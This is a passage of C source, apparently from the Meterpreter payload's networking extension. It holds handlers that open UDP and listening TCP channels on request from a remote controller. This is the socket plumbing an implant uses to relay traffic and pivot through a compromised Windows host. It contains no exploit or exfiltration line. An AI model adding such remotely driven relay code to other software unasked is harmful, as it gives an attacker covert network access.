			ctx->localhost.s_addr = INADDR_ANY;

		phost = packet_get_tlv_value_string( packet, TLV_TYPE_PEER_HOST );
		if( phost )
		{
			dprintf( "[UDP] request_net_udp_channel_open. phost=%s", phost );
			ctx->peerhost.s_addr = inet_addr( phost );
		}

		ctx->sock.fd = WSASocket( AF_INET, SOCK_DGRAM, IPPROTO_UDP, 0, 0, 0 );
		if( ctx->sock.fd == INVALID_SOCKET )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSASocket failed" );

		saddr.sin_family      = AF_INET;
		saddr.sin_port        = htons( ctx->localport );
		saddr.sin_addr.s_addr = ctx->localhost.s_addr;

		if( bind( ctx->sock.fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN) ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. bind failed" );
		
		ctx->sock.notify = WSACreateEvent();
		if( ctx->sock.notify == WSA_INVALID_EVENT )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSACreateEvent failed" );

		if( WSAEventSelect( ctx->sock.fd, ctx->sock.notify, FD_READ ) == SOCKET_ERROR )
			BREAK_ON_WSAERROR( "[UDP] request_net_udp_channel_open. WSAEventSelect failed" );

		memset( &chops, 0, sizeof(DatagramChannelOps) );
		chops.native.context = ctx;
		chops.native.write   = udp_channel_write;
		chops.native.close   = udp_channel_close;

		ctx->sock.channel = channel_create_datagram( 0, 0, &chops );
		if( !ctx->sock.channel )
			BREAK_WITH_ERROR( "[UDP] request_net_udp_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE );

		scheduler_insert_waitable( ctx->sock.notify, ctx, (WaitableNotifyRoutine)udp_channel_notify );

		packet_add_tlv_uint( response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->sock.channel) );

		dprintf( "[UDP] request_net_udp_channel_open. UDP socket on channel %d (The local specified was %s:%d ) (The peer specified was %s:%d)",  channel_get_id( ctx->sock.channel ), inet_ntoa( ctx->localhost ), ctx->localport, inet_ntoa( ctx->peerhost ), ctx->peerport );

	} while( 0 );

	packet_transmit_response( dwResult, remote, response );

	do
	{
		if( dwResult == ERROR_SUCCESS )
			break;

		if( !ctx )		
			break;

		if( ctx->sock.fd )
			closesocket( ctx->sock.fd );
			
		if( ctx->sock.channel )
			channel_destroy( ctx->sock.channel, packet );

		free( ctx );

	} while( 0 );

	return ERROR_SUCCESS;
}
示例#9
0
/*!
 * @brief Allocates a streaming TCP server channel.
 * @param remote Pointer to the remote instance.
 * @param packet Pointer to the request packet.
 * @returns Indication of success or failure.
 * @retval ERROR_SUCCESS Opening the server channel completed successfully.
 */
DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
{
	DWORD dwResult = ERROR_SUCCESS;
	TcpServerContext * ctx = NULL;
	Packet * response = NULL;
	char * lhost = NULL;
	SOCKADDR_IN saddr = { 0 };
	StreamChannelOps chops = { 0 };
	USHORT lport = 0;

	do
	{
		response = packet_create_response(packet);
		if (!response)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. response == NULL", ERROR_NOT_ENOUGH_MEMORY);
		}

		ctx = (TcpServerContext *)malloc(sizeof(TcpServerContext));
		if (!ctx)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. ctx == NULL", ERROR_NOT_ENOUGH_MEMORY);
		}

		memset(ctx, 0, sizeof(TcpServerContext));

		ctx->remote = remote;

		lport = (USHORT)(packet_get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
		if (!lport)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. lport == NULL", ERROR_INVALID_HANDLE);
		}

		lhost = packet_get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);
		if (!lhost)
		{
			lhost = "0.0.0.0";
		}

		ctx->fd = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
		if (ctx->fd == INVALID_SOCKET)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSASocket failed");
		}

		saddr.sin_family = AF_INET;
		saddr.sin_port = htons(lport);
		saddr.sin_addr.s_addr = inet_addr(lhost);

		if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
		{
#ifdef _WIN32
			dwResult = WSAGetLastError();
			if (dwResult != WSAEADDRNOTAVAIL)
#else
			dwResult = errno;
			if (dwResult != EADDRNOTAVAIL)
#endif
			{
				BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
			}

			dprintf("[TCP-SERVER] Failed to bind to %s, trying 0.0.0.0 ...", lhost);

			// try again, but this time bind to any/all interfaces.
			lhost = "0.0.0.0";
			saddr.sin_addr.s_addr = inet_addr(lhost);
			if (bind(ctx->fd, (SOCKADDR *)&saddr, sizeof(SOCKADDR_IN)) == SOCKET_ERROR)
			{
				BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed");
			}
			dwResult = ERROR_SUCCESS;
		}

		if (listen(ctx->fd, SOMAXCONN) == SOCKET_ERROR)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. listen failed");
		}

		ctx->notify = WSACreateEvent();
		if (ctx->notify == WSA_INVALID_EVENT)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSACreateEvent failed");
		}

		if (WSAEventSelect(ctx->fd, ctx->notify, FD_ACCEPT) == SOCKET_ERROR)
		{
			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
		}

		memset(&chops, 0, sizeof(StreamChannelOps));
		chops.native.context = ctx;
		chops.native.close = tcp_channel_server_close;

		ctx->channel = channel_create_stream(0, CHANNEL_FLAG_SYNCHRONOUS, &chops);
		if (!ctx->channel)
		{
			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. channel_create_stream failed", ERROR_INVALID_HANDLE);
		}

		scheduler_insert_waitable(ctx->notify, ctx, NULL, (WaitableNotifyRoutine)tcp_channel_server_notify, NULL);

		packet_add_tlv_uint(response, TLV_TYPE_CHANNEL_ID, channel_get_id(ctx->channel));

		dprintf("[TCP-SERVER] request_net_tcp_server_channel_open. tcp server %s:%d on channel %d", lhost, lport, channel_get_id(ctx->channel));

	} while (0);

	packet_transmit_response(dwResult, remote, response);

	do
	{
		if (dwResult == ERROR_SUCCESS)
		{
			break;
		}

		dprintf("[TCP-SERVER] Error encountered %u 0x%x", dwResult, dwResult);

		if (!ctx)
		{
			break;
		}

		if (ctx->fd)
		{
			dprintf("[TCP-SERVER] Destroying socket");
			closesocket(ctx->fd);
		}

		if (ctx->channel)
		{
			dprintf("[TCP-SERVER] Destroying channel");
			channel_destroy(ctx->channel, packet);
		}

		free(ctx);

	} while (0);

	return dwResult;
}